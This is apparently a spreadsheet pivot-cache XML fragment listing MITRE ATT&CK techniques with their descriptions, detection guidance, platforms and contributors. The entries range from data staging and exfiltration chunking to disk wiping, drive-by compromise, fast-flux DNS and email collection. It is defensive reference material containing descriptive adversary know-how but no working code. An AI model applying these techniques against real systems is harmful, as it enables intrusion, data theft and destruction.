    <x v="7"/>
    <s v="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_x000a__x000a_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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, File: File Creation"/>
    <b v="1"/>
    <s v="T1074"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1074.002"/>
    <x v="133"/>
    <s v="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_x000a__x000a_In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)_x000a__x000a_By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection."/>
    <s v="https://attack.mitre.org/techniques/T1074/002"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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s v="IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, File: File Creation"/>
    <b v="1"/>
    <s v="T1074"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1030"/>
    <x v="134"/>
    <s v="An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts."/>
    <s v="https://attack.mitre.org/techniques/T1030"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="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Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1530"/>
    <x v="135"/>
    <s v="Adversaries may access data objects from improperly secured cloud storage._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1530"/>
    <d v="2019-08-30T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="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
    <s v="IaaS"/>
    <s v="Cloud Storage: Cloud Storage Access"/>
    <b v="0"/>
    <m/>
    <s v="Netskope; Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1602"/>
    <x v="136"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1602"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)"/>
    <s v="Network"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1602.002"/>
    <x v="137"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1602/002"/>
    <d v="2020-10-20T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)"/>
    <s v="Network"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1602"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1602.001"/>
    <x v="138"/>
    <s v="Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP)._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1602/001"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)"/>
    <s v="Network"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1602"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1213"/>
    <x v="139"/>
    <s v="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_x000a__x000a_The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials_x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a__x000a_Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server."/>
    <s v="https://attack.mitre.org/techniques/T1213"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="3.1"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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s v="Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Logon Session: Logon Session Creation"/>
    <b v="0"/>
    <m/>
    <s v="Milos Stojadinovic; Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1213.001"/>
    <x v="140"/>
    <s v="_x000a_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_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials_x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1213/001"/>
    <d v="2020-02-14T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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
    <s v="SaaS"/>
    <s v="Application Log: Application Log Content, Logon Session: Logon Session Creation"/>
    <b v="1"/>
    <s v="T1213"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1213.002"/>
    <x v="141"/>
    <s v="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_x000a__x000a_* Policies, procedures, and standards_x000a_* Physical / logical network diagrams_x000a_* System architecture diagrams_x000a_* Technical system documentation_x000a_* Testing / development credentials_x000a_* Work / project schedules_x000a_* Source code snippets_x000a_* Links to network shares and other internal resources_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1213/002"/>
    <d v="2020-02-14T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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_x000a__x000a_"/>
    <s v="Office 365, Windows"/>
    <s v="Application Log: Application Log Content, Logon Session: Logon Session Creation"/>
    <b v="1"/>
    <s v="T1213"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1005"/>
    <x v="142"/>
    <s v="Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration._x000a__x000a_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_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1005"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="1.2"/>
    <x v="7"/>
    <s v="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b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1039"/>
    <x v="143"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1039"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1.2"/>
    <x v="7"/>
    <s v="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Network Share: Network Share Access"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1025"/>
    <x v="144"/>
    <s v="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_x000a__x000a_Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media."/>
    <s v="https://attack.mitre.org/techniques/T1025"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="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b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1491"/>
    <x v="145"/>
    <s v="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_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1491"/>
    <d v="2019-04-08T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.2"/>
    <x v="1"/>
    <s v="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_x000a__x000a_"/>
    <s v="IaaS, Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1491.002"/>
    <x v="146"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1491/002"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="1"/>
    <s v="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s v="IaaS, Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1491"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1491.001"/>
    <x v="147"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1491/001"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1491"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1140"/>
    <x v="148"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1140"/>
    <d v="2017-12-14T00:00:00"/>
    <d v="2020-07-09T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior."/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Modification, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <s v="Matthew Demaske, Adaptforward; Red Canary"/>
    <m/>
    <s v="Anti-virus, Host intrusion prevention systems, Network intrusion detection system, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1610"/>
    <x v="149"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1610"/>
    <d v="2021-03-29T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1"/>
    <x v="14"/>
    <s v="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
    <s v="Containers"/>
    <s v="Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1587"/>
    <x v="150"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1587"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control."/>
    <s v="PRE"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1587.002"/>
    <x v="151"/>
    <s v="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_x000a__x000a_Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations."/>
    <s v="https://attack.mitre.org/techniques/T1587/002"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1587"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1587.003"/>
    <x v="152"/>
    <s v="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_x000a__x000a_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_x000a__x000a_After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control."/>
    <s v="https://attack.mitre.org/techniques/T1587/003"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="4"/>
    <s v="Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)_x000a__x000a_Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1587"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1587.004"/>
    <x v="153"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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https://attack.mitre.org/techniques/T1587/004"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1587"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1587.001"/>
    <x v="154"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1587/001"/>
    <d v="2020-10-01T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1587"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1006"/>
    <x v="155"/>
    <s v="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_x000a__x000a_Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)"/>
    <s v="https://attack.mitre.org/techniques/T1006"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="2"/>
    <x v="12"/>
    <s v="Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, Drive: Drive Access"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="File monitoring, File system access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1561"/>
    <x v="156"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1561"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1561.001"/>
    <x v="157"/>
    <s v="Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources._x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1561/001"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1561"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1561.002"/>
    <x v="158"/>
    <s v="Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. _x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1561/002"/>
    <d v="2020-02-20T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1561"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1484"/>
    <x v="159"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators."/>
    <s v="https://attack.mitre.org/techniques/T1484"/>
    <d v="2019-03-07T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="2"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
    <s v="Azure AD, Windows"/>
    <s v="Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <s v="Administrator, User"/>
    <s v="File system access controls, System access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1484.002"/>
    <x v="160"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1484/002"/>
    <d v="2020-12-28T00:00:00"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: &quot;Federated Domain Name&quot;&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: &quot;Federated Domain Name&quot; –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)"/>
    <s v="Azure AD, Windows"/>
    <s v="Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution"/>
    <b v="1"/>
    <s v="T1484"/>
    <s v="Blake Strom, Microsoft 365 Defender"/>
    <s v="Administrator"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1484.001"/>
    <x v="161"/>
    <s v="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_x000a__x000a_Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1484/001"/>
    <d v="2020-12-28T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:_x000a__x000a_* Event ID 5136 - A directory service object was modified_x000a_* Event ID 5137 - A directory service object was created_x000a_* Event ID 5138 - A directory service object was undeleted_x000a_* Event ID 5139 - A directory service object was moved_x000a_* Event ID 5141 - A directory service object was deleted_x000a__x000a__x000a_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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution"/>
    <b v="1"/>
    <s v="T1484"/>
    <s v="Itamar Mizrahi, Cymptom; Tristan Bennett, Seamless Intelligence"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1482"/>
    <x v="162"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1482"/>
    <d v="2019-02-14T00:00:00"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1.1000000000000001"/>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_x000a_"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <s v="Dave Westgard; Elia Florio, Microsoft; Mnemonic; RedHuntLabs, @redhuntlabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1189"/>
    <x v="163"/>
    <s v="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_x000a__x000a_Multiple ways of delivering exploit code to a browser exist, including:_x000a__x000a_* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting._x000a_* Malicious ads are paid for and served through legitimate ad providers._x000a_* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content)._x000a__x000a_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_x000a__x000a_Typical drive-by compromise process:_x000a__x000a_1. A user visits a website that is used to host the adversary controlled content._x000a_2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. _x000a_    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes._x000a_3. Upon finding a vulnerable version, exploit code is delivered to the browser._x000a_4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place._x000a_    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered._x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1189"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1.2"/>
    <x v="15"/>
    <s v="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_x000a__x000a_Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code._x000a__x000a_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
    <s v="Linux, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1568"/>
    <x v="164"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1568"/>
    <d v="2020-03-10T00:00:00"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Chris Roffe"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1568.003"/>
    <x v="165"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1568/003"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1568"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1568.002"/>
    <x v="166"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1568/002"/>
    <d v="2020-03-10T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1568"/>
    <s v="Barry Shteiman, Exabeam; Ryan Benson, Exabeam; Sylvain Gil, Exabeam"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1568.001"/>
    <x v="167"/>
    <s v="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_x000a__x000a_The simplest, &quot;single-flux&quot; method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)_x000a__x000a_In contrast, the &quot;double-flux&quot; method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel."/>
    <s v="https://attack.mitre.org/techniques/T1568/001"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1568"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1114"/>
    <x v="168"/>
    <s v="Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. "/>
    <s v="https://attack.mitre.org/techniques/T1114"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="7"/>
    <s v="There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection._x000a__x000a_File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity._x000a__x000a_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_x000a__x000a_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
    <s v="Google Workspace, Office 365, Windows"/>
    <s v="Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation"/>
    <b v="0"/>
    <m/>
    <s v="Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1114.003"/>
    <x v="169"/>
    <s v="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_x000a__x000a_Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more."/>
    <s v="https://attack.mitre.org/techniques/T1114/003"/>
    <d v="2020-02-19T00:00:00"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="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_x000a__x000a_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s v="Google Workspace, Office 365, Windows"/>
    <s v="Application Log: Application Log Content"/>
    <b v="1"/>
    <s v="T1114"/>
    <s v="Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1114.001"/>
    <x v="170"/>
    <s v="Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1114/001"/>
    <d v="2020-02-19T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="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s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1114"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1114.002"/>
    <x v="171"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1114/002"/>
    <d v="2020-02-19T00:00:00"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account)."/>
    <s v="Google Workspace, Office 365, Windows"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation"/>
    <b v="1"/>
    <s v="T1114"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1573"/>
    <x v="172"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1573"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1573.002"/>
    <x v="173"/>
    <s v="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_x000a__x000a_For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)."/>
    <s v="https://attack.mitre.org/techniques/T1573/002"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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573"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1573.001"/>
    <x v="174"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1573/001"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures._x000a__x000a_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573"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1499"/>
    <x v="175"/>
    <s v="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_x000a__x000a_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_x000a__x000a_To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498)._x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1499"/>
    <d v="2019-04-18T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>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_x000a__x000a_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_x000a__x000a_Externally monitor the availability of services that may be targeted by an Endpoint DoS."/>
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
